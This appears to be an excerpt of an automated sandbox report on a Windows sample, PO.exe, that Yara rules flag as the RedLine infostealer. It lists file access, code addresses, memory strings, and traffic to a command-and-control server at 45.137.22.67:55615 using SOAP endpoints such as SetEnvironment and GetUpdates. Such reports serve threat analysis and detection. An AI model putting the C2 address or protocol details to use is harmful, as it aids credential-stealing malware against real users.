Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 4x nop then jmp 07A5794Bh
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 4x nop then jmp 07AA6DBBh

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.137.22.67:55615

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49723

Source: global traffic

TCP traffic: 192.168.2.5:49710 -> 45.137.22.67:55615

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.67:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.67:55615Content-Length: 559666Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.67:55615Content-Length: 559658Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.67:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.67:55615Content-Length: 559133Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.67:55615Content-Length: 559125Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.000000000347E000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.67:55615
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.67:55615/
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.67:55615t-
Source: PO.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: PO.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PO.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: PO.exe, 00000007.00000002.2160002789.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000003018000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000003019000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: PO.exe	String found in binary or memory: http://www.aforgenet.com/framework/
Source: AJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000002F69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: PO.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0017720F
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0017E3FB
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0017837D
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0018E430
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00192578
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00172606
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_001927A7
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00180870
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00178934
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0019AA50
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0017FBD3
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00178D89
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0019EE32
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0019AEFE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_05B70670
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_05B7D210
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_05B7E818
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_05B7E80A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E540F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E61BC
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E4FE8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E2C18
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E96D0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E5387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E539C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E4FD8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E9DE0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E9DF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E2C09
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E99AB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A51628
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A52E38
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A51638
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A59E60
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A50DB8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A50DC8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A502B8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A51200
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A53270
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A511F0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_02FBE7B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_02FBDC90
